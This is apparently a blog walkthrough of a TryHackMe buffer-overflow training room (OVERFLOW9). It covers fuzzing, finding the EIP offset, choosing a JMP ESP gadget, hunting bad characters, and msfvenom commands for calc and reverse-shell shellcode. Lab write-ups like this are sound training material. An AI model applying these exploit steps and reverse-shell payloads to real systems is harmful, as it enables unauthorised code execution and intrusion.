hello friends in this article we will see a walkthrough of an interesting Tryhackme room called OSCP buffer overflow prep. It has 10 different sets of offsets and badcharactes we will cover OVERFLOW9 where we will weaponizing the memory corruption bugs to gain RCE. The techniques used are solely for educational purposes. I am not responsible if the listed techniques are used against any other targets. For any queries contact me in Twitter : https://twitter.com/0xAnnLynn
Room link: https://www.tryhackme.com/room/bufferoverflowprep
Note: This room is completely Free
The best way to get rid of your enemies is to make them your friends
I did not use the RDP inside TryHackMe, instead, I download all the files and put in my local Windows machine.
My environment :
Debugging machine : windows 7
Attacker machine : Arch Linux Host
we going to use python2
You know? You can write blogs at hacklido too!
Without wasting time i instantly started fuzzing the binary. The room also gives a basic fuzzing script so we can identify at which point the program crashes but i didn’t use the fuzzer script 😜 instead i manually throw some junk via netcat so we can understand what fuzzer doing internally. on our next article we deeply disscuss about fuzzing and create our own fuzzers with peach and boofuzz.
start our vulnerable application
our vulnerable application reveals something. It listening on port 1337 so we connecting to that port from attacker machine via netcat. This application stores userinput inside the program it intentionally made to be vulenerable so i started sending junk of data. now connect to the respective port the application running
OVERFLOW9 (our junk data)
I passed 5000 bytes of A to OVERFLOW9. i used python to generate the junk
python2 -c ‘print “A”*5000’
After passing the data program crashed
confirm this by attaching the binary to Immunity debugger
Ensure our program in running state by checking the status in the lower right of Immunity Debugger.
If it isn’t running press f5 to run
Again send that 5000 bytes of A via netcat to OVERFLOW9
EIP is overwritten with 41414141 which is hexadecimal representaion of AAAA so we confirmed that we can overwrite EIP to control the program.
2. Finding Offsets
we successfully overwrite EIP with AAAA but we don’t know exactly which A overwrites the EIP so we generate some unique pattern. To generate the pattern Im using pattern_create.rb one of the metasploit utility also we can use cyclic pattern from pwntools
pattern_create.rb -l 5000
-l length for our unique pattern
Start building our skeleton exploit with some required details from the server
We need to send our payload after the welcome message which proves successfull connection. Welcome to …[snip]… help. add our unique pattern to our exploit skeleton.
I am using pwn tools to easier our exploit development process.
Install pwn tools
pip install pwntools
Attach the program to immunity and start the process then execute our exploit and back to immuntuy debugger
EIP have different value we use this value to calculate the exact offset to overwrite EIP
using pattern_offset.rb metasploit utility to calculate offset pattern_offset.rb -q 35794234
1514 is our offset to control EIP to confirm that modify our exploit remove the pattern instead use offset of 1514 bytes of A and 4 bytes B then 500 bytes of C.
start the program in immunity and run the exploit
EIP have 42424242 which hexadecimal representaion on BBBB.
3. Finding JMP ESP
To find jmp esp we using mona.py to simplyfy the process
To list the DLL used by the program
In this list essfunc.dll don’t have any mitigation so we can use that to find our JUM ESP gadget.
To find the gadget we need the opcode for JMP ESP. We use nasm_shell.rb to find the opcode
opcode for JMP ESP is FF E4 we find JMP ESP gadget by this opcode using mona
!mona find -s "\xff\xe4" -m essfunc.dll
we have bunch of gadgets Im using 0×62501205 make sure our gadget don’t have any badcharacters which we will find in seperate phase. I already know this address don’t have any badchars. double click the gadget to land the memory region the gadget present
we confirmed that address pointing to JMP ESP in essfunc.dll used by the program
now restart the debugger and set a break point at the address. ctrl + g to search address location
press f2 to set breakpoint
modify our exploit instead of BBBB use the JMP ESP address to overwrite EIP address so we can conrol the execution flow
p32( ) is pwntools utillity using this we can pack address to little endian format so that we don’t need to write the address manually in little endian format. Then run the exploit
we hit the breakpoint and EIP points to our JMP ESP gadget
4. Hunting badcharacters
google for badcharacters we can see some github repos listing badchars. i given the link below
modify our exploit with the badcharacters
badcharacters are possible 256 hexadecimal values from \x00 - \xff. If badcharacters present in our final shellcode it will break the execution inside memory so we can’t get code execution thats why we identifying badcharacters. functions like strcpy will copy data without validation until it see a null byte(\x00) so we cant use x00 in our shellcode. and function like gets will get user data without validation until it see a new line character (\x0a). i hope you understand why we hunting badcharacters not only this. Different program has different badcharacters so we neeed to hunt them. Im not going detail into badcharactes so i will show how to hunt 1 character then you will find the rest of the bad chars on you own thats the reason this room created 😅 right click the esp and click dump stack to view this
here we can see after 3D the pattern changing from our input so 3e is a badchar
After E0 the pattern changing from our input so E1 is a badchar
i assume you will find the rest of the badchars
This are the badchars OVERFLOW9 have
5. Generating shellcode
For a proof of concept i will generate shellcode to pop calculator after that we will create for reverse shell
msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x04\x3e\x3f\xe1' -f c
copy the shellcode and paste in our exploit
use nops for gracefully execute the shellcode in between stack to eip nealy 8 bytes of free space we have so fill that with using nops. The space may vary by program so we using 50. Atleast use minimum of 16 nops for any program
now test the exploit against target this time we don’t need to attach to debugger
we successfully poped calc on target but the application after poping calc we need to continute the execution without crashing for that we use some threading. windows is heavily threaded so we execute the shellcode in seperate thread so the application won’t crash and our shellcode also execute 😄 so we now generate shellcode for reverse shell with threading
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 EXITFUNC=thread -b '\x00\x04\x3e\x3f\xe1' -f c
Reaplace the calc shellcode with newly created reverse shell shellcode. start listner on port 443 then execute the exploit
we successfully got reverse shell and check what happend to the program
program didn’t crashed so we successfully executed shellcode on seperate thread like some of the malwares doing :)
After getting shell program didn’t crashed, shellcode executed on seperate thread and program still working confirm that by connecting to that port via netcat reveals program still working
Exploit we created here will be found on my github repo
In our next series we will cover SEH overflow, space restriction (egg hunters), mitigation bypass, 3 byte overflow, rop chain and more. If you like my work share and support me. correct me if i made any mistake. I will do more in future want any specific topic feel free to DM me i will try my best.